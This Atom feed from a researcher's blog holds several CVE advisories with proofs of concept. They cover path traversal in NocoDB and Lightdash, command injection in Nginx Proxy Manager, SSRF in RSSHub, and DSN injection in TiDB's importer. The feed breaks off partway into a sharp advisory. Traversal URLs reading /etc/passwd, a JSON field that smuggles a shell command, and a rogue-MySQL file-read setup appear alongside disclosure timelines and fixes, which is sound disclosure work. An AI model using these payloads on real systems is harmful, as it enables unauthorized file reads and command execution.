Jekyll2023-06-20T05:50:35+00:00/atom.xmldw1’s AdvisoryEvery1's a fraud 'cuz they pick & choose what they show.dwisiswant0CVE-2023-35843: Arbitrary File Read in NocoDB2023-06-19T00:00:00+00:002023-06-19T00:00:00+00:00/CVE-2023-35843<h2 id="summary">Summary</h2>
<p>The NocoDB application version <= 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the <code class="language-plaintext highlighter-rouge">path</code> parameter of the <code class="language-plaintext highlighter-rouge">/download</code> route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.</p>
<h2 id="description">Description</h2>
<p>The <code class="language-plaintext highlighter-rouge">fileRead</code> function is responsible for serving attachment files from the server. This function takes the <code class="language-plaintext highlighter-rouge">path</code> parameter from the request URL, appends it to a fixed path, and then utilizes the <code class="language-plaintext highlighter-rouge">attachmentService</code> to retrieve the attachment file based on the provided path parameter.</p>
<h2 id="details">Details</h2>
<h3 id="fileread-function"><code class="language-plaintext highlighter-rouge">fileRead</code> Function</h3>
<p>File <a href="https://github.com/nocodb/nocodb/blob/6decfa2b20c28db9946bddce0bcb1442b683ecae/packages/nocodb/src/lib/controllers/attachment.ctl.ts#L62-L74"><code class="language-plaintext highlighter-rouge">/packages/nocodb/src/lib/controllers/attachment.ctl.ts:62-74</code></a>:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">export</span> <span class="k">async</span> <span class="kd">function</span> <span class="nx">fileRead</span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// ...</span>
<span class="kd">const</span> <span class="p">{</span> <span class="nx">img</span><span class="p">,</span> <span class="nx">type</span> <span class="p">}</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">attachmentService</span><span class="p">.</span><span class="nx">fileRead</span><span class="p">({</span>
<span class="na">path</span><span class="p">:</span> <span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="dl">'</span><span class="s1">nc</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">uploads</span><span class="dl">'</span><span class="p">,</span> <span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">?.[</span><span class="mi">0</span><span class="p">]),</span>
<span class="p">});</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">writeHead</span><span class="p">(</span><span class="mi">200</span><span class="p">,</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="nx">type</span> <span class="p">});</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">end</span><span class="p">(</span><span class="nx">img</span><span class="p">,</span> <span class="dl">'</span><span class="s1">binary</span><span class="dl">'</span><span class="p">);</span>
<span class="c1">// ...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>When a request is made to this function, it constructs the file path by combining the predetermined paths <code class="language-plaintext highlighter-rouge">'nc', 'uploads'</code>, and the value of the <code class="language-plaintext highlighter-rouge">req.params?.[0]</code> parameter. This parameter allows dynamic inclusion of the requested file’s path within the server’s directory structure.</p>
<h3 id="proof-of-concept">Proof of Concept</h3>
<p>An attacker can exploit this vulnerability by crafting a specially crafted URL containing a path parameter that includes directory traversal sequences such as <code class="language-plaintext highlighter-rouge">../</code>. By including enough of these sequences, the attacker can traverse up the directory hierarchy and access files outside of the intended directory. In the steps to reproduce below, an attacker can access the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file by traversing up several levels from the <code class="language-plaintext highlighter-rouge">nc/uploads</code> directory.</p>
<h4 id="steps-to-reproduce">Steps to Reproduce</h4>
<p>Send a GET request to the following URL: <code class="language-plaintext highlighter-rouge">http://localhost/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd</code>.
The server will respond with the contents of the /etc/passwd file.</p>
<h2 id="impact">Impact</h2>
<p>This vulnerability allows an unauthenticated attacker to access sensitive files on the server, leading to potential information disclosure.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>12 Apr 2023: Vulnerability reported thru huntr.dev platform.</li>
<li>13 Apr 2023: The huntr team contacted NocoDB team.</li>
<li>13 May 2023: Report staled.</li>
<li>03 Jun 2023: Request a CVE ID to MITRE CNA.</li>
<li>19 Jun 2023: CVE-2023-35843 was assigned.</li>
<li>19 Jun 2023: Advisory published.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/nocodb/nocodb/blob/6decfa2b20c28db9946bddce0bcb1442b683ecae/packages/nocodb/src/lib/controllers/attachment.ctl.ts#L62-L74"><code class="language-plaintext highlighter-rouge">/packages/nocodb/src/lib/controllers/attachment.ctl.ts:62-74</code></a></li>
</ul>dwisiswant0SummaryCVE-2023-35844: Arbitrary File Read in Lightdash2023-06-19T00:00:00+00:002023-06-19T00:00:00+00:00/CVE-2023-35844<h2 id="summary">Summary</h2>
<p>Lightdash version <= 0.506.4 is vulnerable to a path traversal attack, allowing an attacker to access arbitrary files on the server. This vulnerability can be exploited by appending directory traversal sequences to the image ID parameter of the Slack image endpoint, enabling the attacker to bypass access controls and read sensitive files on the server.</p>
<h2 id="description">Description</h2>
<p>The Slack image endpoint is designed to serve images that have been uploaded to Slack and subsequently saved on the Lightdash server. The endpoint takes an image ID as a parameter and returns the corresponding image file. The vulnerability lies in the way the server handles the image ID parameter, which is not properly sanitized or validated.</p>
<h2 id="details">Details</h2>
<h3 id="slack-router">Slack Router</h3>
<p>File <a href="https://github.com/lightdash/lightdash/blob/fe599f87f5bdfe05b4221f94dc25f4b180d0b7a7/packages/backend/src/routers/slackRouter.ts#L66-L71"><code class="language-plaintext highlighter-rouge">/packages/backend/src/routers/slackRouter.ts:66-71</code></a>:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">slackRouter</span><span class="p">.</span><span class="kd">get</span><span class="p">(</span>
<span class="dl">'</span><span class="s1">/image/:imageId</span><span class="dl">'</span><span class="p">,</span>
<span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">,</span> <span class="nx">next</span><span class="p">)</span> <span class="o">=></span> <span class="p">{</span>
<span class="c1">// ...</span>
<span class="kd">const</span> <span class="nx">filePath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="dl">'</span><span class="s1">/tmp</span><span class="dl">'</span><span class="p">,</span> <span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">imageId</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">fs</span><span class="p">.</span><span class="nx">existsSync</span><span class="p">(</span><span class="nx">filePath</span><span class="p">))</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">error</span> <span class="o">=</span> <span class="s2">`This file </span><span class="p">${</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">imageId</span><span class="p">}</span><span class="s2"> doesn't exist on this server, this may be happening if you are running multiple containers or because files are not persisted. You can check out our docs to learn more on how to enable cloud storage: https://docs.lightdash.com/self-host/customize-deployment/configure-lightdash-to-use-external-object-storage`</span><span class="p">;</span>
<span class="k">throw</span> <span class="k">new</span> <span class="nx">NotFoundError</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">sendFile</span><span class="p">(</span><span class="nx">filePath</span><span class="p">);</span>
<span class="c1">// ...</span>
<span class="p">},</span>
<span class="p">);</span>
</code></pre></div></div>
<p>When a request is made to the <code class="language-plaintext highlighter-rouge">/image/:imageId</code> endpoint, the server constructs a file path by appending the <code class="language-plaintext highlighter-rouge">imageId</code> parameter to the <code class="language-plaintext highlighter-rouge">/tmp</code> directory. This file path is used to locate and serve the corresponding image file. However, the server does not properly sanitize or validate the imageId parameter, making it susceptible to attacks.</p>
<p>In the event that the constructed file path does not exist on the server, an error message is thrown, indicating that the requested file does not exist. This error message provides information that could aid an attacker in understanding the server’s configuration and potential vulnerabilities.</p>
<h3 id="proof-of-concept">Proof of Concept</h3>
<p>To exploit the vulnerability, an attacker can utilize a <code class="language-plaintext highlighter-rouge">curl</code> command to send a malicious request to the server. The following command demonstrates the proof of concept:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="s2">"https://localhost/api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd"</span>
</code></pre></div></div>
<p>In that command, the attacker manipulates the imageId parameter by appending <code class="language-plaintext highlighter-rouge">%2F..%2F..%2F..%2Fetc%2Fpasswd</code>. This string is URL-encoded and represents a traversal sequence (<code class="language-plaintext highlighter-rouge">../</code>) that allows the attacker to navigate outside the intended directory structure.</p>
<p>By exploiting this traversal vulnerability, the attacker can traverse multiple directories and access the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file.</p>
<h2 id="impact">Impact</h2>
<p>This vulnerability allows an unauthenticated attacker to access sensitive files on the server, leading to potential information disclosure.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>12 Apr 2023: Vulnerability reported thru huntr.dev platform.</li>
<li>14 Apr 2023: The huntr team contacted lightdash team.</li>
<li>15 Apr 2023: Silent fix rolled out at version <a href="https://github.com/lightdash/lightdash/releases/tag/0.510.3">0.510.3</a>.</li>
<li>03 Jun 2023: Request a CVE ID to MITRE CNA.</li>
<li>19 Jun 2023: CVE-2023-35844 was assigned.</li>
<li>19 Jun 2023: Advisory published.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/lightdash/lightdash/blob/fe599f87f5bdfe05b4221f94dc25f4b180d0b7a7/packages/backend/src/routers/slackRouter.ts#L66-L71"><code class="language-plaintext highlighter-rouge">/packages/backend/src/routers/slackRouter.ts:66-71</code></a></li>
<li><a href="https://github.com/lightdash/lightdash/commit/fcc808c84c2cc3afb343063e32a49440d32a553c">lightdash/lightdash@<code class="language-plaintext highlighter-rouge">fcc808c8</code></a></li>
<li><a href="https://github.com/lightdash/lightdash/releases/tag/0.510.3">https://github.com/lightdash/lightdash/releases/tag/0.510.3</a></li>
</ul>dwisiswant0SummaryCVE-2023-23596: OS Command Injection in Nginx Proxy Manager2023-01-20T00:00:00+00:002023-01-20T00:00:00+00:00/CVE-2023-23596<h2 id="description">Description</h2>
<p>Nginx Proxy Manager prior to version <= 2.9.19 is vulnerable to OS command injection. When creating an access list, the back-end will build an <code class="language-plaintext highlighter-rouge">htpasswd</code> file with crafted username and/or password input and concatenated without any validation and is directly passed to the <code class="language-plaintext highlighter-rouge">exec</code> command, potentially allowing an authenticated attacker to execute arbitrary commands on the system.</p>
<h2 id="details">Details</h2>
<h3 id="building-access-file">Building Access file</h3>
<p>File <a href="https://github.com/NginxProxyManager/nginx-proxy-manager/blob/4f10d129c20cc82494b95cc94b97f859dbd4b54d/backend/internal/access-list.js#L507-L513"><code class="language-plaintext highlighter-rouge">/backend/internal/access-list.js:507-513</code></a>:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c1">// ...</span>
<span class="k">if</span> <span class="p">(</span><span class="k">typeof</span> <span class="nx">item</span><span class="p">.</span><span class="nx">password</span> <span class="o">!==</span> <span class="dl">'</span><span class="s1">undefined</span><span class="dl">'</span> <span class="o">&&</span> <span class="nx">item</span><span class="p">.</span><span class="nx">password</span><span class="p">.</span><span class="nx">length</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">logger</span><span class="p">.</span><span class="nx">info</span><span class="p">(</span><span class="dl">'</span><span class="s1">Adding: </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">item</span><span class="p">.</span><span class="nx">username</span><span class="p">);</span>
<span class="nx">utils</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="dl">'</span><span class="s1">/usr/bin/htpasswd -b "</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">htpasswd_file</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">" "</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">item</span><span class="p">.</span><span class="nx">username</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">" "</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">item</span><span class="p">.</span><span class="nx">password</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">"</span><span class="dl">'</span><span class="p">)</span>
<span class="p">.</span><span class="nx">then</span><span class="p">((</span><span class="cm">/*result*/</span><span class="p">)</span> <span class="o">=></span> <span class="p">{</span>
<span class="nx">next</span><span class="p">();</span>
<span class="p">})</span>
<span class="c1">// ...</span>
</code></pre></div></div>
<p>The vulnerability in the code snippet above is located in the <strong>build</strong> method, where the <code class="language-plaintext highlighter-rouge">utils.exec()</code> function is used to execute the <code class="language-plaintext highlighter-rouge">/usr/bin/htpasswd</code> command. The function takes <strong>item.username</strong> and <strong>item.password</strong> as input, which is concatenated to create an htpasswd file & passed as an argument to the <code class="language-plaintext highlighter-rouge">utils.exec()</code> function. This allows an attacker to inject arbitrary commands into the input, potentially allowing them to execute arbitrary commands on the system.</p>
<h3 id="proof-of-concept">Proof of Concept</h3>
<p>This proof of concept demonstrates how an attacker can exploit this vulnerability. It uses a <code class="language-plaintext highlighter-rouge">curl</code> command to send a POST request to the <u>`/api/nginx/access-lists`</u> endpoint for creating an access list.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>curl <span class="nt">-sX</span> POST http://TARGET.HOST/api/nginx/access-lists <span class="se">\</span>
<span class="o">></span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="k">${</span><span class="nv">JWT</span><span class="k">}</span><span class="s2">"</span> <span class="se">\</span>
<span class="o">></span> <span class="nt">--data-binary</span> <span class="s2">"@payload.json"</span>
</code></pre></div></div>
<p>The request includes a JSON Web Token (JWT) in the “Authorization” header to authenticate the request, and the payload of the request is taken from a <code class="language-plaintext highlighter-rouge">payload.json</code> file, which contains the JSON data for creating an access list, including the name of the list, the type of access control, and an array of items.</p>
<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
</span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"lorem-ipsum"</span><span class="p">,</span><span class="w">
</span><span class="nl">"satisfy_any"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
</span><span class="nl">"pass_auth"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
</span><span class="nl">"items"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="p">{</span><span class="w">
</span><span class="nl">"username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"foo"</span><span class="p">,</span><span class="w">
</span><span class="nl">"password"</span><span class="p">:</span><span class="w"> </span><span class="s2">"bar</span><span class="se">\"</span><span class="s2">;touch </span><span class="se">\"</span><span class="s2">pwned"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span><span class="p">],</span><span class="w">
</span><span class="nl">"clients"</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
<p>In this example, the payload includes a single item with a username of “<strong>foo</strong>” and a password of “<strong>bar”;touch “pwned</strong>”. When the request is sent, the server-side code will process the payload, and will insert the payload’s <code class="language-plaintext highlighter-rouge">username</code> and <code class="language-plaintext highlighter-rouge">password</code> into the <code class="language-plaintext highlighter-rouge">htpasswd</code> command without any validation. This payload contains a malicious command, <strong>touch “pwned”</strong>, which will create an empty <code class="language-plaintext highlighter-rouge">pwned</code> file, and will be executed by the server.</p>
<h2 id="impact">Impact</h2>
<p>By injecting arbitrary commands into the <code class="language-plaintext highlighter-rouge">htpasswd</code> command, an attacker can execute arbitrary commands on the server.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>20 May 2022: Vulnerability reported thru huntr.dev platform.</li>
<li>21 May 2022: The huntr team filed <a href="https://github.com/nginxproxymanager/nginx-proxy-manager/issues/2063">open issue</a> to request security contact.</li>
<li>17 Sep 2022: Report staled.</li>
<li>14 Jan 2023: Request a CVE ID to MITRE CNA.</li>
<li>15 Jan 2023: CVE-2023-23596 was assigned.</li>
<li>20 Jan 2023: Advisory published.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/NginxProxyManager/nginx-proxy-manager/blob/4f10d129c20cc82494b95cc94b97f859dbd4b54d/backend/internal/access-list.js#L510">/backend/internal/access-list.js:510</a></li>
</ul>dwisiswant0DescriptionCVE-2023-22493: Server Side Request Forgery (SSRF) in RSSHub2023-01-13T00:00:00+00:002023-01-13T00:00:00+00:00/CVE-2023-22493<h2 id="description">Description</h2>
<p>An attacker can exploit this vulnerability by sending a request to the affected routes with a malicious URL. For example, if an attacker controls the ATTACKER.HOST domain, they can send a request to affected routes with the value set to <code class="language-plaintext highlighter-rouge">ATTACKER.HOST%2F%23</code>.
The <code class="language-plaintext highlighter-rouge">%2F</code> and <code class="language-plaintext highlighter-rouge">%23</code> characters are URL-encoded versions of the forward-slash (<code class="language-plaintext highlighter-rouge">/</code>) and pound (<code class="language-plaintext highlighter-rouge">#</code>) characters, respectively. In this context, an attacker could use those characters to append the base URL <em>(i.e. <code class="language-plaintext highlighter-rouge">https://${input}.defined.host</code>)</em> to be modified to <code class="language-plaintext highlighter-rouge">https://ATTACKER.HOST/#.defined.host</code>. This will cause the server to send a request to the attacker-controlled domain, allowing the attacker to potentially gain access to sensitive information or perform further attacks on the server. <sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup></p>
<h2 id="impact">Impact</h2>
<p>An attacker could use this vulnerability to send requests to internal or any other servers or resources on the network, potentially gain access to sensitive information that would not normally be accessible and amplifying the impact of the attack.</p>
<h2 id="mitigation">Mitigation</h2>
<p>To mitigate this vulnerability, validate the user-supplied value in the parameter for concatenation as a host to ensure that they do not contain malicious values. For example:</p>
<ol>
<li>Split the input string into an array of strings using the “<code class="language-plaintext highlighter-rouge">.</code>” character as the separator.</li>
<li>Check if each element in the array is a valid <em>(sub)</em>-domain. A subdomain name must meet <a href="https://www.ietf.org/rfc/rfc1034.txt">RFC 1034</a> criteria:
<ul>
<li>Be at least 1 character long or 63 characters or less.</li>
<li>Consist only of alphanumeric characters, and hyphens.</li>
<li>Not start or end with a hyphen (“<code class="language-plaintext highlighter-rouge">-</code>”).</li>
</ul>
</li>
</ol>
<p>Here’s an example of an approach with a validation function:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">isValidHost</span><span class="p">(</span><span class="nx">input</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">parts</span> <span class="o">=</span> <span class="nx">input</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">.</span><span class="dl">'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">regex</span> <span class="o">=</span> <span class="sr">/^</span><span class="se">[</span><span class="sr">a-zA-Z0-9</span><span class="se">]([</span><span class="sr">a-zA-Z0-9</span><span class="se">\-]{0,61}[</span><span class="sr">a-zA-Z0-9</span><span class="se">])?</span><span class="sr">$/</span><span class="p">;</span>
<span class="k">return</span> <span class="nx">parts</span><span class="p">.</span><span class="nx">every</span><span class="p">((</span><span class="nx">part</span><span class="p">)</span> <span class="o">=></span> <span class="nx">regex</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">part</span><span class="p">));</span>
<span class="p">}</span>
<span class="c1">// subd0main: true</span>
<span class="c1">// -subd0main: false</span>
<span class="c1">// sub-d0main: true</span>
<span class="c1">// subd0main-: false</span>
<span class="c1">// sub.d0main: true</span>
<span class="c1">// sub-.d0main: false</span>
<span class="c1">// s: true</span>
<span class="c1">// -: false</span>
<span class="c1">// 0: true</span>
<span class="c1">// s-: false</span>
<span class="c1">// s-u: true</span>
<span class="c1">// su: true</span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">input</code> string is split into an array of parts using the <code class="language-plaintext highlighter-rouge">.split()</code> method, with <code class="language-plaintext highlighter-rouge">'.'</code> as the delimiter. This will give you an array of subdomains, such as <code class="language-plaintext highlighter-rouge">['some', 'sub', 'domain']</code> for the input <code class="language-plaintext highlighter-rouge">'some.sub.domain'</code>.</p>
<p>A regex pattern is defined to match the previously mentioned criteria. The regular expression allows for a maximum of <strong>63</strong> characters (including the hyphens) per subdomain, except the first & last characters, which can be a letter or a number but not a hyphen.</p>
<p>The <code class="language-plaintext highlighter-rouge">.every()</code> method is used to check if every element in the parts array satisfies the condition specified by the callback function. The callback function uses the <code class="language-plaintext highlighter-rouge">.test()</code> method of the RegExp object to test if each element matches the regular expression. If all elements in the array pass the test, the <code class="language-plaintext highlighter-rouge">.every()</code> method will return <strong>true</strong>. If any element fails the test, the <code class="language-plaintext highlighter-rouge">.every()</code> method will return <strong>false</strong>.</p>
<p>Implementing the above functionality is part of a subdomain’s multi-level validation. For one level subdomain, there is no need to give expression to split the <code class="language-plaintext highlighter-rouge">input</code> into an array of parts using the <code class="language-plaintext highlighter-rouge">.split()</code> method.</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">isValidHost</span><span class="p">(</span><span class="nx">input</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">regex</span> <span class="o">=</span> <span class="sr">/^</span><span class="se">[</span><span class="sr">a-zA-Z0-9</span><span class="se">]([</span><span class="sr">a-zA-Z0-9</span><span class="se">\-]{0,61}[</span><span class="sr">a-zA-Z0-9</span><span class="se">])?</span><span class="sr">$/</span><span class="p">;</span>
<span class="k">return</span> <span class="nx">regex</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">input</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>See reference<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup> for the details.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>09 Jan 2023: Vulnerability reported to codeowner.</li>
<li>10 Jan 2023: Vulnerability acknowledged.</li>
<li>10 Jan 2023: Patch rolled out. [<sup id="fnref:2:1" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>]</li>
<li>12 Jan 2023: Vulnerability disclosed.</li>
</ul>
<h2 id="references">References</h2>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:1" role="doc-endnote">
<p><a href="https://github.com/advisories/GHSA-64wp-jh9p-5cg2">GHSA-64wp-jh9p-5cg2</a> <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:2" role="doc-endnote">
<p><a href="https://github.com/DIYgod/RSSHub/pull/11588">DIYgod/RSSHub#11588</a> <a href="#fnref:2" class="reversefootnote" role="doc-backlink">↩</a> <a href="#fnref:2:1" class="reversefootnote" role="doc-backlink">↩<sup>2</sup></a></p>
</li>
</ol>
</div>dwisiswant0DescriptionCVE-2022-3023: DSN Injection in TiDB Server Importer2022-11-21T00:00:00+00:002022-11-21T00:00:00+00:00/CVE-2022-3023<h2 id="description">Description</h2>
<p>TiDB server (importer CLI tool) prior to version 6.4.0 & 6.1.3 is vulnerable to data source name injection. The database name for generating and inserting data to a database does not properly sanitize user input which can lead to arbitrary file reads.</p>
<h2 id="vulnerable-snippet">Vulnerable snippet</h2>
<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/importer/db.go:320-328</span>
<span class="k">func</span> <span class="n">createDB</span><span class="p">(</span><span class="n">cfg</span> <span class="n">DBConfig</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">sql</span><span class="o">.</span><span class="n">DB</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
<span class="n">dbDSN</span> <span class="o">:=</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"%s:%s@tcp(%s:%d)/%s?charset=utf8"</span><span class="p">,</span> <span class="n">cfg</span><span class="o">.</span><span class="n">User</span><span class="p">,</span> <span class="n">cfg</span><span class="o">.</span><span class="n">Password</span><span class="p">,</span> <span class="n">cfg</span><span class="o">.</span><span class="n">Host</span><span class="p">,</span> <span class="n">cfg</span><span class="o">.</span><span class="n">Port</span><span class="p">,</span> <span class="n">cfg</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span>
<span class="n">db</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">sql</span><span class="o">.</span><span class="n">Open</span><span class="p">(</span><span class="s">"mysql"</span><span class="p">,</span> <span class="n">dbDSN</span><span class="p">)</span>
<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
<span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">errors</span><span class="o">.</span><span class="n">Trace</span><span class="p">(</span><span class="n">err</span><span class="p">)</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">db</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>TiDB server importer use <a href="https://github.com/go-sql-driver/mysql">Go MySQL Driver</a> for connecting to MySQL servers, and it has a built-in protection against <code class="language-plaintext highlighter-rouge">LOCAL INFILE</code> query requests.</p>
<p>To access the requested file, we need set the <strong>allowAllFiles</strong> parameter to <strong>true</strong> in the DSN string when connecting to the MySQL server.</p>
<p>Let’s set up vulnerable environment for TiDB server version 6.3.0.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>git clone https://github.com/pingcap/tidb <span class="nt">-b</span> v6.3.0 <span class="nt">--depth</span> 1
<span class="nv">$ </span><span class="nb">cd </span>tidb/cmd/importer
<span class="nv">$ </span>go build <span class="nb">.</span>
</code></pre></div></div>
<p>Set up MySQL fake server for read files, <a href="https://github.com/allyshka/Rogue-MySql-Server">Rogue-MySql-Server</a> script by <a href="https://github.com/allyshka">@allyshka</a>.
Run & input the path to file you’re interested in.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>wget <span class="nt">-q</span> https://github.com/allyshka/Rogue-MySql-Server/raw/master/roguemysql.php
<span class="nv">$ </span>php roguemysql.php
</code></pre></div></div>
<p>Specify our server address in the <code class="language-plaintext highlighter-rouge">config.toml</code> file.</p>
<div class="language-toml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cmd/importer/config.toml:33-38</span>
<span class="nn">[db]</span>
<span class="py">host</span> <span class="p">=</span> <span class="s">"127.0.0.1"</span>
<span class="py">user</span> <span class="p">=</span> <span class="s">"root"</span>
<span class="py">password</span> <span class="p">=</span> <span class="s">""</span>
<span class="py">name</span> <span class="p">=</span> <span class="py">"test?allowAllFiles</span><span class="p">=</span><span class="kc">true</span><span class="err">&</span><span class="s">"</span><span class="err">
</span><span class="py">port</span> <span class="p">=</span> <span class="mi">3306</span>
</code></pre></div></div>
<p>Execute the <code class="language-plaintext highlighter-rouge">importer</code> command with the previous defined config file.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>./importer <span class="nt">-config</span> config.toml
</code></pre></div></div>
<p><img src="https://i.ibb.co/YjcR9yf/image.png" alt="" /></p>
<p>The TiDB importer has connected to the rogue MySQL server, which has requested the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file to be read, and the TiDB importer has transferred this file’s contents to us!</p>
<h2 id="impact">Impact</h2>
<p>This issue lead to a arbitrary file read.</p>
<h2 id="mitigation">Mitigation</h2>
<p>Upgrade TiDB Server to version >= 6.4.0.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>26 Dec 2021: Vulnerability reported thru huntr.dev.</li>
<li>28 Dec 2021: huntr team contacted TiDB security team.</li>
<li>04 Jan 2022: Report & vulnerability acknowledged.</li>
<li>19 Oct 2022: Vulnerability fixed.</li>
<li>17 Nov 2022: Patch version rolled out.</li>
<li>21 Nov 2022: Vulnerability disclosed.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://huntr.dev/bounties/120f1346-e958-49d0-b66c-0f889a469540/">https://huntr.dev/bounties/120f1346-e958-49d0-b66c-0f889a469540/</a></li>
<li><a href="https://github.com/pingcap/tidb/commit/d0376379d615cc8f263a0b17c031ce403c8dcbfb">pingcap/tidb@<code class="language-plaintext highlighter-rouge">d0376379</code></a></li>
</ul>dwisiswant0DescriptionCVE-2022-29256: OS Command Injection in sharp2022-05-25T00:00:00+00:002022-05-25T00:00:00+00:00/CVE-2022-29256<h2 id="description">Description</h2>
<p>sharp prior to version 0.30.4 is vulnerable to OS command injection. The environment <code class="language-plaintext highlighter-rouge">PKG_CONFIG_PATH</code> variable is used to check the pre-built dependency version and concatenated without any validation and promptly used by the <code class="language-plaintext highlighter-rouge">spawnSync</code> command method while post-installation of the package.</p>
<h2 id="vulnerable-snippet">Vulnerable snippet</h2>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// lib/libvips.js</span>
<span class="mi">66</span><span class="p">:</span> <span class="kd">const</span> <span class="nx">globalLibvipsVersion</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
